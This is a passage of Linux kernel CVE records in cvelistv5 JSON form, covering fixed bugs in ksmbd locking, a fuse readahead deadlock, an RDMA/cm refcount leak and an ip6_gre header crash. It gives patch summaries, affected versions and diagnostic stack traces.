ci->m_lock while others do so without taking the lock at all.
Examples:
- ksmbd_query_inode_status() and __ksmbd_inode_close() use
ci->m_lock when checking or updating m_flags.
- ksmbd_inode_pending_delete(), ksmbd_set_inode_pending_delete(),
ksmbd_clear_inode_pending_delete() and ksmbd_fd_set_delete_on_close()
used to read and modify m_flags without ci->m_lock.
This creates a potential data race on m_flags when multiple threads
open, close and delete the same file concurrently. In the worst case
delete-on-close and pending-delete bits can be lost or observed in an
inconsistent state, leading to confusing delete semantics (files that
stay on disk after delete-on-close, or files that disappear while still
in use).
Fix it by:
- Making ksmbd_query_inode_status() look at m_flags under ci->m_lock
after dropping inode_hash_lock.
- Adding ci->m_lock protection to all helpers that read or modify
m_flags (ksmbd_inode_pending_delete(), ksmbd_set_inode_pending_delete(),
ksmbd_clear_inode_pending_delete(), ksmbd_fd_set_delete_on_close()).
- Keeping the existing ci->m_lock protection in __ksmbd_inode_close(),
and moving the actual unlink/xattr removal outside the lock.
This unifies the locking around m_flags and removes the data race while
preserving the existing delete-on-close behaviour.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: f44158485826c076335d6860d35872271a83791d, < 5adad9727a815c26013b0d41cfee92ffa7d4037c (git) |
| Linux | Linux | Affected: f44158485826c076335d6860d35872271a83791d, < ccc78781041589ea383e61d5d7a1e9a31b210b93 (git) |
| Linux | Linux | Affected: f44158485826c076335d6860d35872271a83791d, < ee63729760f5b61a66f345c54dc4c7514e62383d (git) |
| Linux | Linux | Affected: f44158485826c076335d6860d35872271a83791d, < 991f8a79db99b14c48d20d2052c82d65b9186cad (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/smb/server/vfs_cache.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5adad9727a815c26013b0d41cfee92ffa7d4037c",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
},
{
"lessThan": "ccc78781041589ea383e61d5d7a1e9a31b210b93",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
},
{
"lessThan": "ee63729760f5b61a66f345c54dc4c7514e62383d",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
},
{
"lessThan": "991f8a79db99b14c48d20d2052c82d65b9186cad",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/smb/server/vfs_cache.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.15"
},
{
"lessThan": "5.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: vfs: fix race on m_flags in vfs_cache\n\nksmbd maintains delete-on-close and pending-delete state in\nksmbd_inode-\u003em_flags. In vfs_cache.c this field is accessed under\ninconsistent locking: some paths read and modify m_flags under\nci-\u003em_lock while others do so without taking the lock at all.\n\nExamples:\n\n - ksmbd_query_inode_status() and __ksmbd_inode_close() use\n ci-\u003em_lock when checking or updating m_flags.\n - ksmbd_inode_pending_delete(), ksmbd_set_inode_pending_delete(),\n ksmbd_clear_inode_pending_delete() and ksmbd_fd_set_delete_on_close()\n used to read and modify m_flags without ci-\u003em_lock.\n\nThis creates a potential data race on m_flags when multiple threads\nopen, close and delete the same file concurrently. In the worst case\ndelete-on-close and pending-delete bits can be lost or observed in an\ninconsistent state, leading to confusing delete semantics (files that\nstay on disk after delete-on-close, or files that disappear while still\nin use).\n\nFix it by:\n\n - Making ksmbd_query_inode_status() look at m_flags under ci-\u003em_lock\n after dropping inode_hash_lock.\n - Adding ci-\u003em_lock protection to all helpers that read or modify\n m_flags (ksmbd_inode_pending_delete(), ksmbd_set_inode_pending_delete(),\n ksmbd_clear_inode_pending_delete(), ksmbd_fd_set_delete_on_close()).\n - Keeping the existing ci-\u003em_lock protection in __ksmbd_inode_close(),\n and moving the actual unlink/xattr removal outside the lock.\n\nThis unifies the locking around m_flags and removes the data race while\npreserving the existing delete-on-close behaviour."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T08:51:39.332Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5adad9727a815c26013b0d41cfee92ffa7d4037c"
},
{
"url": "https://git.kernel.org/stable/c/ccc78781041589ea383e61d5d7a1e9a31b210b93"
},
{
"url": "https://git.kernel.org/stable/c/ee63729760f5b61a66f345c54dc4c7514e62383d"
},
{
"url": "https://git.kernel.org/stable/c/991f8a79db99b14c48d20d2052c82d65b9186cad"
}
],
"title": "ksmbd: vfs: fix race on m_flags in vfs_cache",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68809",
"datePublished": "2026-01-13T15:29:15.817Z",
"dateReserved": "2025-12-24T10:30:51.047Z",
"dateUpdated": "2026-01-14T08:51:39.332Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68821 (GCVE-0-2025-68821)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
fuse: fix readahead reclaim deadlock
Summary
In the Linux kernel, the following vulnerability has been resolved:
fuse: fix readahead reclaim deadlock
Commit e26ee4efbc79 ("fuse: allocate ff->release_args only if release is
needed") skips allocating ff->release_args if the server does not
implement open. However in doing so, fuse_prepare_release() now skips
grabbing the reference on the inode, which makes it possible for an
inode to be evicted from the dcache while there are inflight readahead
requests. This causes a deadlock if the server triggers reclaim while
servicing the readahead request and reclaim attempts to evict the inode
of the file being read ahead. Since the folio is locked during
readahead, when reclaim evicts the fuse inode and fuse_evict_inode()
attempts to remove all folios associated with the inode from the page
cache (truncate_inode_pages_range()), reclaim will block forever waiting
for the lock since readahead cannot relinquish the lock because it is
itself blocked in reclaim:
>>> stack_trace(1504735)
folio_wait_bit_common (mm/filemap.c:1308:4)
folio_lock (./include/linux/pagemap.h:1052:3)
truncate_inode_pages_range (mm/truncate.c:336:10)
fuse_evict_inode (fs/fuse/inode.c:161:2)
evict (fs/inode.c:704:3)
dentry_unlink_inode (fs/dcache.c:412:3)
__dentry_kill (fs/dcache.c:615:3)
shrink_kill (fs/dcache.c:1060:12)
shrink_dentry_list (fs/dcache.c:1087:3)
prune_dcache_sb (fs/dcache.c:1168:2)
super_cache_scan (fs/super.c:221:10)
do_shrink_slab (mm/shrinker.c:435:9)
shrink_slab (mm/shrinker.c:626:10)
shrink_node (mm/vmscan.c:5951:2)
shrink_zones (mm/vmscan.c:6195:3)
do_try_to_free_pages (mm/vmscan.c:6257:3)
do_swap_page (mm/memory.c:4136:11)
handle_pte_fault (mm/memory.c:5562:10)
handle_mm_fault (mm/memory.c:5870:9)
do_user_addr_fault (arch/x86/mm/fault.c:1338:10)
handle_page_fault (arch/x86/mm/fault.c:1481:3)
exc_page_fault (arch/x86/mm/fault.c:1539:2)
asm_exc_page_fault+0x22/0x27
Fix this deadlock by allocating ff->release_args and grabbing the
reference on the inode when preparing the file for release even if the
server does not implement open. The inode reference will be dropped when
the last reference on the fuse file is dropped (see fuse_file_put() ->
fuse_release_end()).
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: a39f70d63f4373a598820d9491719e44cd60afe9 , < cbbf3f1bb9f834bb2acbb61ddca74363456e19cd (git) |
| Linux | Linux | Affected: 7d38aa079ed859b73f4460aab89c7619b04963b8 , < 4703bc0e8cd3409acb1476a70cb5b7ff943cf39a (git) |
| Linux | Linux | Affected: c7ec75f3cbf73bd46f479f7d6942585f765715da , < cf74785c00b8b1c0c4a9dd74bfa9c22d62e2d99f (git) |
| Linux | Linux | Affected: e26ee4efbc79610b20e7abe9d96c87f33dacc1ff , < fbba8b00bbe4e4f958a2b0654cc1219a7e6597f6 (git) |
| Linux | Linux | Affected: e26ee4efbc79610b20e7abe9d96c87f33dacc1ff , < e0d6de83a4cc22bbac72713f3a58121af36cc411 (git) |
| Linux | Linux | Affected: e26ee4efbc79610b20e7abe9d96c87f33dacc1ff , < bd5603eaae0aabf527bfb3ce1bb07e979ce5bd50 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/fuse/file.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cbbf3f1bb9f834bb2acbb61ddca74363456e19cd",
"status": "affected",
"version": "a39f70d63f4373a598820d9491719e44cd60afe9",
"versionType": "git"
},
{
"lessThan": "4703bc0e8cd3409acb1476a70cb5b7ff943cf39a",
"status": "affected",
"version": "7d38aa079ed859b73f4460aab89c7619b04963b8",
"versionType": "git"
},
{
"lessThan": "cf74785c00b8b1c0c4a9dd74bfa9c22d62e2d99f",
"status": "affected",
"version": "c7ec75f3cbf73bd46f479f7d6942585f765715da",
"versionType": "git"
},
{
"lessThan": "fbba8b00bbe4e4f958a2b0654cc1219a7e6597f6",
"status": "affected",
"version": "e26ee4efbc79610b20e7abe9d96c87f33dacc1ff",
"versionType": "git"
},
{
"lessThan": "e0d6de83a4cc22bbac72713f3a58121af36cc411",
"status": "affected",
"version": "e26ee4efbc79610b20e7abe9d96c87f33dacc1ff",
"versionType": "git"
},
{
"lessThan": "bd5603eaae0aabf527bfb3ce1bb07e979ce5bd50",
"status": "affected",
"version": "e26ee4efbc79610b20e7abe9d96c87f33dacc1ff",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/fuse/file.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.9"
},
{
"lessThan": "6.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15.196",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.158",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.6.115",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: fix readahead reclaim deadlock\n\nCommit e26ee4efbc79 (\"fuse: allocate ff-\u003erelease_args only if release is\nneeded\") skips allocating ff-\u003erelease_args if the server does not\nimplement open. However in doing so, fuse_prepare_release() now skips\ngrabbing the reference on the inode, which makes it possible for an\ninode to be evicted from the dcache while there are inflight readahead\nrequests. This causes a deadlock if the server triggers reclaim while\nservicing the readahead request and reclaim attempts to evict the inode\nof the file being read ahead. Since the folio is locked during\nreadahead, when reclaim evicts the fuse inode and fuse_evict_inode()\nattempts to remove all folios associated with the inode from the page\ncache (truncate_inode_pages_range()), reclaim will block forever waiting\nfor the lock since readahead cannot relinquish the lock because it is\nitself blocked in reclaim:\n\n\u003e\u003e\u003e stack_trace(1504735)\n folio_wait_bit_common (mm/filemap.c:1308:4)\n folio_lock (./include/linux/pagemap.h:1052:3)\n truncate_inode_pages_range (mm/truncate.c:336:10)\n fuse_evict_inode (fs/fuse/inode.c:161:2)\n evict (fs/inode.c:704:3)\n dentry_unlink_inode (fs/dcache.c:412:3)\n __dentry_kill (fs/dcache.c:615:3)\n shrink_kill (fs/dcache.c:1060:12)\n shrink_dentry_list (fs/dcache.c:1087:3)\n prune_dcache_sb (fs/dcache.c:1168:2)\n super_cache_scan (fs/super.c:221:10)\n do_shrink_slab (mm/shrinker.c:435:9)\n shrink_slab (mm/shrinker.c:626:10)\n shrink_node (mm/vmscan.c:5951:2)\n shrink_zones (mm/vmscan.c:6195:3)\n do_try_to_free_pages (mm/vmscan.c:6257:3)\n do_swap_page (mm/memory.c:4136:11)\n handle_pte_fault (mm/memory.c:5562:10)\n handle_mm_fault (mm/memory.c:5870:9)\n do_user_addr_fault (arch/x86/mm/fault.c:1338:10)\n handle_page_fault (arch/x86/mm/fault.c:1481:3)\n exc_page_fault (arch/x86/mm/fault.c:1539:2)\n asm_exc_page_fault+0x22/0x27\n\nFix this deadlock by allocating ff-\u003erelease_args and grabbing the\nreference on the inode when preparing the file for release even if the\nserver does not implement open. The inode reference will be dropped when\nthe last reference on the fuse file is dropped (see fuse_file_put() -\u003e\nfuse_release_end())."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:26.320Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cbbf3f1bb9f834bb2acbb61ddca74363456e19cd"
},
{
"url": "https://git.kernel.org/stable/c/4703bc0e8cd3409acb1476a70cb5b7ff943cf39a"
},
{
"url": "https://git.kernel.org/stable/c/cf74785c00b8b1c0c4a9dd74bfa9c22d62e2d99f"
},
{
"url": "https://git.kernel.org/stable/c/fbba8b00bbe4e4f958a2b0654cc1219a7e6597f6"
},
{
"url": "https://git.kernel.org/stable/c/e0d6de83a4cc22bbac72713f3a58121af36cc411"
},
{
"url": "https://git.kernel.org/stable/c/bd5603eaae0aabf527bfb3ce1bb07e979ce5bd50"
}
],
"title": "fuse: fix readahead reclaim deadlock",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68821",
"datePublished": "2026-01-13T15:29:24.014Z",
"dateReserved": "2025-12-24T10:30:51.048Z",
"dateUpdated": "2026-01-19T12:19:26.320Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71084 (GCVE-0-2025-71084)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
Title
RDMA/cm: Fix leaking the multicast GID table reference
Summary
In the Linux kernel, the following vulnerability has been resolved:
RDMA/cm: Fix leaking the multicast GID table reference
If the CM ID is destroyed while the CM event for multicast creating is
still queued the cancel_work_sync() will prevent the work from running
which also prevents destroying the ah_attr. This leaks a refcount and
triggers a WARN:
GID entry ref leak for dev syz1 index 2 ref=573
WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]
WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886
Destroy the ah_attr after canceling the work, it is safe to call this
twice.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 60d613b39e8d0c9f3b526e9c96445422b4562d76 , < d5ce588a9552878859a4d44b70b724216c188a5f (git) |
| Linux | Linux | Affected: fe454dc31e84f8c14cb8942fcb61666c9f40745b , < abf38398724ecc888f62c678d288da40d11878af (git) |
| Linux | Linux | Affected: fe454dc31e84f8c14cb8942fcb61666c9f40745b , < ab668a58c4a2ccb6d54add7a76f2f955d15d0196 (git) |
| Linux | Linux | Affected: fe454dc31e84f8c14cb8942fcb61666c9f40745b , < c0acdee513239e1d6e1b490f56be0e6837dfd162 (git) |
| Linux | Linux | Affected: fe454dc31e84f8c14cb8942fcb61666c9f40745b , < 5cb34bb5fd726491b809efbeb5cfd63ae5bf9cf3 (git) |
| Linux | Linux | Affected: fe454dc31e84f8c14cb8942fcb61666c9f40745b , < 3ba6d01c4b3c584264dc733c6a2ecc5bbc8e0bb5 (git) |
| Linux | Linux | Affected: fe454dc31e84f8c14cb8942fcb61666c9f40745b , < 57f3cb6c84159d12ba343574df2115fb18dd83ca (git) |
| Linux | Linux | Affected: a3262b3884dd67b4c5632ce7cdf9cff9d1a575d4 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/core/cma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d5ce588a9552878859a4d44b70b724216c188a5f",
"status": "affected",
"version": "60d613b39e8d0c9f3b526e9c96445422b4562d76",
"versionType": "git"
},
{
"lessThan": "abf38398724ecc888f62c678d288da40d11878af",
"status": "affected",
"version": "fe454dc31e84f8c14cb8942fcb61666c9f40745b",
"versionType": "git"
},
{
"lessThan": "ab668a58c4a2ccb6d54add7a76f2f955d15d0196",
"status": "affected",
"version": "fe454dc31e84f8c14cb8942fcb61666c9f40745b",
"versionType": "git"
},
{
"lessThan": "c0acdee513239e1d6e1b490f56be0e6837dfd162",
"status": "affected",
"version": "fe454dc31e84f8c14cb8942fcb61666c9f40745b",
"versionType": "git"
},
{
"lessThan": "5cb34bb5fd726491b809efbeb5cfd63ae5bf9cf3",
"status": "affected",
"version": "fe454dc31e84f8c14cb8942fcb61666c9f40745b",
"versionType": "git"
},
{
"lessThan": "3ba6d01c4b3c584264dc733c6a2ecc5bbc8e0bb5",
"status": "affected",
"version": "fe454dc31e84f8c14cb8942fcb61666c9f40745b",
"versionType": "git"
},
{
"lessThan": "57f3cb6c84159d12ba343574df2115fb18dd83ca",
"status": "affected",
"version": "fe454dc31e84f8c14cb8942fcb61666c9f40745b",
"versionType": "git"
},
{
"status": "affected",
"version": "a3262b3884dd67b4c5632ce7cdf9cff9d1a575d4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/core/cma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.12"
},
{
"lessThan": "5.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.11.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/cm: Fix leaking the multicast GID table reference\n\nIf the CM ID is destroyed while the CM event for multicast creating is\nstill queued the cancel_work_sync() will prevent the work from running\nwhich also prevents destroying the ah_attr. This leaks a refcount and\ntriggers a WARN:\n\n GID entry ref leak for dev syz1 index 2 ref=573\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886\n\nDestroy the ah_attr after canceling the work, it is safe to call this\ntwice."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:47.115Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d5ce588a9552878859a4d44b70b724216c188a5f"
},
{
"url": "https://git.kernel.org/stable/c/abf38398724ecc888f62c678d288da40d11878af"
},
{
"url": "https://git.kernel.org/stable/c/ab668a58c4a2ccb6d54add7a76f2f955d15d0196"
},
{
"url": "https://git.kernel.org/stable/c/c0acdee513239e1d6e1b490f56be0e6837dfd162"
},
{
"url": "https://git.kernel.org/stable/c/5cb34bb5fd726491b809efbeb5cfd63ae5bf9cf3"
},
{
"url": "https://git.kernel.org/stable/c/3ba6d01c4b3c584264dc733c6a2ecc5bbc8e0bb5"
},
{
"url": "https://git.kernel.org/stable/c/57f3cb6c84159d12ba343574df2115fb18dd83ca"
}
],
"title": "RDMA/cm: Fix leaking the multicast GID table reference",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71084",
"datePublished": "2026-01-13T15:34:47.665Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-01-19T12:19:47.115Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71098 (GCVE-0-2025-71098)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
Title
ip6_gre: make ip6gre_header() robust
Summary
In the Linux kernel, the following vulnerability has been resolved:
ip6_gre: make ip6gre_header() robust
Over the years, syzbot found many ways to crash the kernel
in ip6gre_header() [1].
This involves team or bonding drivers ability to dynamically
change their dev->needed_headroom and/or dev->hard_header_len
In this particular crash mld_newpack() allocated an skb
with a too small reserve/headroom, and by the time mld_sendpack()
was called, syzbot managed to attach an ip6gre device.
[1]
skbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0
------------[ cut here ]------------
kernel BUG at net/core/skbuff.c:213 !
<TASK>
skb_under_panic net/core/skbuff.c:223 [inline]
skb_push+0xc3/0xe0 net/core/skbuff.c:2641
ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371
dev_hard_header include/linux/netdevice.h:3436 [inline]
neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618
neigh_output include/net/neighbour.h:556 [inline]
ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136
__ip6_finish_output net/ipv6/ip6_output.c:-1 [inline]
ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220
NF_HOOK_COND include/linux/netfilter.h:307 [inline]
ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247
NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318
mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855
mld_send_cr net/ipv6/mcast.c:2154 [inline]
mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: c12b395a46646bab69089ce7016ac78177f6001f , < 17e7386234f740f3e7d5e58a47b5847ea34c3bc2 (git) |
| Linux | Linux | Affected: c12b395a46646bab69089ce7016ac78177f6001f , < 41a1a3140aff295dee8063906f70a514548105e8 (git) |
| Linux | Linux | Affected: c12b395a46646bab69089ce7016ac78177f6001f , < adee129db814474f2f81207bd182bf343832a52e (git) |
| Linux | Linux | Affected: c12b395a46646bab69089ce7016ac78177f6001f , < 1717357007db150c2d703f13f5695460e960f26c (git) |
| Linux | Linux | Affected: c12b395a46646bab69089ce7016ac78177f6001f , < 5fe210533e3459197eabfdbf97327dacbdc04d60 (git) |
| Linux | Linux | Affected: c12b395a46646bab69089ce7016ac78177f6001f , < 91a2b25be07ce1a7549ceebbe82017551d2eec92 (git) |
| Linux | Linux | Affected: c12b395a46646bab69089ce7016ac78177f6001f , < db5b4e39c4e63700c68a7e65fc4e1f1375273476 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/ip6_gre.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "17e7386234f740f3e7d5e58a47b5847ea34c3bc2",
"status": "affected",
"version": "c12b395a46646bab69089ce7016ac78177f6001f",
"versionType": "git"
},
{
"lessThan": "41a1a3140aff295dee8063906f70a514548105e8",
"status": "affected",
"version": "c12b395a46646bab69089ce7016ac78177f6001f",
"versionType": "git"
},
{
"lessThan": "adee129db814474f2f81207bd182bf343832a52e",
"status": "affected",
"version": "c12b395a46646bab69089ce7016ac78177f6001f",
"versionType": "git"
},
{
"lessThan": "1717357007db150c2d703f13f5695460e960f26c",
"status": "affected",
"version": "c12b395a46646bab69089ce7016ac78177f6001f",
"versionType": "git"
},
{
"lessThan": "5fe210533e3459197eabfdbf97327dacbdc04d60",
"status": "affected",
"version": "c12b395a46646bab69089ce7016ac78177f6001f",
"versionType": "git"
},
{
"lessThan": "91a2b25be07ce1a7549ceebbe82017551d2eec92",
"status": "affected",
"version": "c12b395a46646bab69089ce7016ac78177f6001f",
"versionType": "git"
},
{
"lessThan": "db5b4e39c4e63700c68a7e65fc4e1f1375273476",
"status": "affected",
"version": "c12b395a46646bab69089ce7016ac78177f6001f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
